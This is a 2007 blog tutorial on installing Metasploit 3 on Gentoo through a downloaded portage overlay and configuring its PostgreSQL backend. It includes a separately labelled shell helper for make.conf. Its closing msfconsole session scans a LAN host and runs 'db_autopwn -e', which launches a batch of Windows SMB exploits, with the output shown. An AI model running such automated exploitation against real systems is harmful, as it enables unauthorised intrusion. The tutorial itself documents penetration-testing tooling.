metasploit3 on gentoo
Bored of waiting for metasploit3 to hit portage? Download metasploit3-ebuild.tgz and unpack it into a portage overlay directory. If you use layman, or have your own overlay setup, the next few commands are probably not for you; if not, they will do (note that the echo line appends a fresh PORTDIR_OVERLAY definition, so if /etc/make.conf already has one, add this directory to the existing value instead, since the last assignment wins):
mkdir -p /usr/local/portage/netdotnet.net
cd /usr/local/portage/netdotnet.net
wget http://www.netdotnet.net/assets/18/metasploit3-ebuild.tgz
tar zxvf metasploit3-ebuild.tgz
rm metasploit3-ebuild.tgz
echo "PORTDIR_OVERLAY=\"`pwd`\"" >> /etc/make.conf
cd
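The echo line above blindly appends a second PORTDIR_OVERLAY assignment when /etc/make.conf already has one, and the last assignment silently replaces the first. The following is an added example, not part of the original post: a small POSIX sh helper (the names add_overlay, overlay_list and overlay_count are my own) that merges the new overlay into any existing PORTDIR_OVERLAY value and is safe to re-run.

```shell
#!/bin/sh
# Hypothetical helper (not from the original post): add an overlay directory
# to PORTDIR_OVERLAY in a make.conf-style file without creating a duplicate
# definition. Usage: add_overlay /etc/make.conf /usr/local/portage/netdotnet.net

# overlay_list CONF: print the overlay directories of the last
# PORTDIR_OVERLAY="..." line in CONF, one per line (nothing if unset)
overlay_list() {
    sed -n 's/^PORTDIR_OVERLAY="\{0,1\}\([^"]*\)"\{0,1\}$/\1/p' "$1" \
        | tail -n 1 | tr ' ' '\n' | sed '/^$/d'
}

# overlay_count CONF: number of overlay directories currently configured
overlay_count() {
    set -- $(overlay_list "$1")   # word splitting is intended here
    echo $#
}

# add_overlay CONF DIR: merge DIR into PORTDIR_OVERLAY (idempotent)
add_overlay() {
    conf=$1
    dir=$2
    if grep -q '^PORTDIR_OVERLAY=' "$conf" 2>/dev/null; then
        cur=$(overlay_list "$conf" | tr '\n' ' ')
        case " $cur " in
            *" $dir "*) return 0 ;;   # already listed, nothing to do
        esac
        new="$cur$dir"
        # rewrite the existing definition(s) in place via a temp file;
        # any duplicate definitions collapse into the same merged value
        sed "s|^PORTDIR_OVERLAY=.*|PORTDIR_OVERLAY=\"$new\"|" "$conf" \
            > "$conf.tmp" && mv "$conf.tmp" "$conf"
    else
        # no definition yet: appending is the right thing to do
        printf 'PORTDIR_OVERLAY="%s"\n' "$dir" >> "$conf"
    fi
}
```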
Then emerge the packages; do read the output of emerge -av before confirming:
echo "net-analyzer/metasploit gtk postgres sqlite3" >> /etc/portage/package.use
ACCEPT_KEYWORDS="~x86" emerge -av postgresql '=rails-1.2.2' '=metasploit-3.0'
You should see something like the following:
These are the packages that would be merged, in order:
Calculating dependencies... done!
[ebuild R ] dev-db/postgresql-8.2.4-r1 USE="nls pam perl python readline ssl xml zlib -doc -kerberos -pg-intdatetime (-selinux) -tcl -test" 0 kB
[ebuild R ] dev-ruby/rails-1.2.2 USE="-doc -fastcgi -mysql -postgres -sqlite -sqlite3" 0 kB
[ebuild Rf ] net-analyzer/metasploit-3.0 USE="gtk postgres sqlite3 -httpd -sqlite2" 0 kB [1]
Total: 3 packages (3 reinstalls), Size of downloads: 0 kB
Fetch Restriction: 1 package
Portage overlays:
[1] /usr/local/portage/netdotnet.net
Would you like to merge these packages? [Yes/No]
Yours should say [ebuild N ] instead; what matters is that you get the reference to your portage overlay ([1] above). If that looks right, hit enter. The metasploit package is fetch-restricted (the Rf flag and "Fetch Restriction: 1 package" above), so you will be forced to jump through hoops to get it (go to the http URL in a browser, click 'I agree', grab the file, copy it where emerge tells you to, re-run emerge for metasploit, GRR...), but if all goes well, become your usual non-root user, e.g.:
su - luser
and initiate your database malarkey as this non-root user (note that initdb defaults to 'trust' authentication for local connections unless you pass -A, so any local user who can reach the socket can connect as any role; keep this instance local to the box):
initdb /home/luser/metasploit3
pg_ctl -D /home/luser/metasploit3 -l /home/luser/metasploit3.log start
Become root again and do the following at the msf prompt (the ERROR: table ... does not exist lines from db_create come from the schema dropping each table before recreating it; on a fresh database they are expected):
gentoo ~ # msfconsole3
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
=[ msf v3.0
+ -- --=[ 176 exploits - 104 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 30 aux
msf > load db_postgres
[*] Successfully loaded plugin: db_postgres
msf > createuser -U luser -P
[*] Executing: `createuser -U luser -P`
Enter name of role to add: root
Enter password for new role:
Enter it again:
Shall the new role be a superuser? (y/n) y
CREATE ROLE
msf > db_create
CREATE DATABASE
ERROR: table "hosts" does not exist
NOTICE: CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for table "hosts"
NOTICE: CREATE TABLE / UNIQUE will create implicit index "hosts_address_key" for table "hosts"
ERROR: table "services" does not exist
NOTICE: CREATE TABLE will create implicit sequence "services_id_seq" for serial column "services.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "services_pkey" for table "services"
ERROR: table "vulns" does not exist
NOTICE: CREATE TABLE will create implicit sequence "vulns_id_seq" for serial column "vulns.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "vulns_pkey" for table "vulns"
ERROR: table "refs" does not exist
NOTICE: CREATE TABLE will create implicit sequence "refs_id_seq" for serial column "refs.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "refs_pkey" for table "refs"
ERROR: table "vulns_refs" does not exist
[*] Database creation complete (check for errors)
msf > db_hosts
msf > db_nmap -p 445 192.168.10.2
Starting Nmap 4.20 ( http://insecure.org ) at 2007-09-04 04:32 BST
Interesting ports on 192.168.10.2:
PORT STATE SERVICE
445/tcp open microsoft-ds
Nmap finished: 1 IP address (1 host up) scanned in 0.266 seconds
msf > db_services
[*] Service: host=192.168.10.2 port=445 proto=tcp state=up name=microsoft-ds
msf > db_autopwn
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
Only obtain a single shell per target system (NON-FUNCTIONAL)
-r Use a reverse connect shell
-b Use a bind shell on a random port
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
msf > db_autopwn -e
msf > db_autopwn -p -e
[*] Launching exploit/windows/smb/ms03_049_netapi (1/12) against 192.168.10.2:445...
[*] Started bind handler
[*] Launching exploit/windows/smb/ms05_039_pnp (4/12) against 192.168.10.2:445...
[*] Launching exploit/windows/smb/ms04_031_netdde (5/12) against 192.168.10.2:445...
[*] Connecting to the SMB service...
[*] Started bind handler
[*] Started bind handler
[*] Launching auxiliary/dos/windows/smb/ms05_047_pnp (7/12) against 192.168.10.2:445...
[*] >> Exception during launch from auxiliary/dos/windows/smb/ms05_047_pnp: A target has not been selected.
[*] Launching exploit/windows/smb/ms06_040_netapi (8/12) against 192.168.10.2:445...
[*] Started bind handler
[*] Launching exploit/windows/smb/ms04_011_lsass (9/12) against 192.168.10.2:445...
[*] Started bind handler
msf > [*] Binding to 6bffd098-a112-3610-9833-46c3f87e345a:1.0@ncacn_np:192.168.10.2[\BROWSER] ...
[*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.10.2[\browser] ...
[*] Trying target Windows 2000 SP4...
[*] Binding to 2f5f3220-c126-1076-b549-074d078619da:1.2@ncacn_np:192.168.10.2[\nddeapi]
[*] No target detected for Unix/Samba 3.0.24...
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.10.2[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.10.2[\lsarpc]...
[*] Getting OS information...
[*] No target is available for Unix
msf >
If things don't go as above, please consider that the above was emerged against a portage tree synced yesterday. If you still feel I have missed something important, contact me via the link at the top and I will amend this page.
Posted by doug on Tuesday, September 04, 2007